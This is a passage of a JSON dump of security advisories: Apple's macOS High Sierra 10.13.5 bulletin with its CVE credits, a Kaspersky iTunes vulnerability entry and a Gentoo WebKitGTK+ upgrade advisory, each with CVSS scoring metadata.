addressed with improved indexing.\n\nCVE-2018-4217: Jacob Greenfield of Commonwealth School\n\nEntry added December 10, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4141: an anonymous researcher, Zhao Qixun (@S0rryMybad) of Qihoo 360 Vulcan Team\n\n**IOFireWireAVC**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4228: Benjamin Gnahm (@mitp0sh) of Mentor Graphics\n\n**IOGraphics**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4236: Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team\n\n**IOHIDFamily**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4234: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\nEntry updated December 18, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: In some circumstances, some operating systems may not expect or properly handle an Intel architecture debug exception after certain instructions. The issue appears to be from an undocumented side effect of the instructions. An attacker might utilize this exception handling to gain access to Ring 0 and access sensitive memory or control operating system processes.\n\nCVE-2018-8897: Andy Lutomirski, Nick Peterson (linkedin.com/in/everdox) of Everdox Tech LLC\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**libxpc**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added October 30, 2018\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An attacker may be able to exfiltrate the contents of S/MIME- encrypted e-mail\n\nDescription: An issue existed in the handling of encrypted Mail. This issue was addressed with improved isolation of MIME in Mail.\n\nCVE-2018-4227: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Messages**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**NVIDIA Graphics Drivers**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4230: Ian Beer of Google Project Zero\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Users may be tracked by malicious websites using client certificates\n\nDescription: An issue existed in the handling of S-MIME certificates. This issue was addressed with improved validation of S-MIME certificates.\n\nCVE-2018-4221: Damian Poddebniak of M\u00fcnster University of Applied Sciences, Christian Dresen of M\u00fcnster University of Applied Sciences, Jens M\u00fcller of Ruhr University Bochum, Fabian Ising of M\u00fcnster University of Applied Sciences, Sebastian Schinzel of M\u00fcnster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, J\u00f6rg Schwenk of Ruhr University Bochum\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**Speech**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: A sandbox issue existed in the handling of microphone access. This issue was addressed with improved handling of microphone access.\n\nCVE-2018-4184: Jakob Rieck (@0xdead10cc) of the Security in Distributed Systems Group, University of Hamburg\n\n**UIKit**\n\nAvailable for: macOS High Sierra 10.13.4\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**Windows Server**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.4\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4193: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative, Richard Zhu (fluorescence) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2019-10-08T03:27:11", "title": "About the security content of macOS High Sierra 10.13.5, Security Update 2018-003 Sierra, Security Update 2018-003 El Capitan - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4184", "CVE-2018-4253", "CVE-2018-4211", "CVE-2018-4193", "CVE-2018-4223", "CVE-2018-4181", "CVE-2018-4227", "CVE-2018-4219", "CVE-2018-4229", "CVE-2018-4225", "CVE-2018-4228", "CVE-2018-4194", "CVE-2018-4236", "CVE-2018-4234", "CVE-2018-4182", "CVE-2018-4202", "CVE-2018-4180", "CVE-2018-4242", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4221", "CVE-2018-4255", "CVE-2018-4478", "CVE-2018-4254", "CVE-2018-4258", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4251", "CVE-2018-4159", "CVE-2018-4235", "CVE-2018-4249", "CVE-2018-8897", "CVE-2018-4183", "CVE-2018-7584", "CVE-2018-4240", "CVE-2018-4217", "CVE-2018-5383", "CVE-2018-4196", "CVE-2018-4257", "CVE-2018-4171", "CVE-2018-4256", "CVE-2018-4141", "CVE-2018-4243", "CVE-2018-4230", "CVE-2018-4226"], "modified": "2019-10-08T03:27:11", "id": "APPLE:HT208849", "href": "https://support.apple.com/kb/HT208849", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:12:59", "description": "### *Detect date*:\n05/29/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes earlier than 12.7.5\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.7.5 for Windows](<https://support.apple.com/en-us/HT208852>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2018-4194](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4194>)6.8High \n[CVE-2018-4218](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4218>)6.8High \n[CVE-2018-4246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4246>)6.8High \n[CVE-2018-4222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4222>)6.8High \n[CVE-2018-4224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4224>)2.1Warning \n[CVE-2018-4225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4225>)2.1Warning \n[CVE-2018-4226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4226>)2.1Warning \n[CVE-2018-4232](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4232>)4.3Warning \n[CVE-2018-4233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4233>)6.8High \n[CVE-2018-4188](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4188>)4.3Warning \n[CVE-2018-4190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4190>)4.3Warning \n[CVE-2018-4192](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4192>)5.1High \n[CVE-2018-4199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4199>)6.8High \n[CVE-2018-4200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4200>)6.8High \n[CVE-2018-4201](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4201>)6.8High \n[CVE-2018-4204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4204>)6.8High \n[CVE-2018-4214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4214>)6.8High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "kaspersky", "title": "KLA11282 Multiple vulnerabilities in Apple iTunes", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4194", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2020-06-18T00:00:00", "id": "KLA11282", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11282/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:04:13", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. \n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. \n\n### Impact\n\nA remote attacker could execute arbitrary commands or cause a denial of service condition via a maliciously crafted web content. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebkitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.20.4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-22T00:00:00", "type": "gentoo", "title": "WebkitGTK+: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12293", "CVE-2018-12294", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4261", "CVE-2018-4262", "CVE-2018-4263", "CVE-2018-4264", "CVE-2018-4265", "CVE-2018-4266", "CVE-2018-4267", "CVE-2018-4270", "CVE-2018-4272", "CVE-2018-4273", "CVE-2018-4278", "CVE-2018-4284"], "modified": "2018-08-22T00:00:00", "id": "GLSA-201808-04", "href": "https://security.gentoo.org/glsa/201808-04", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}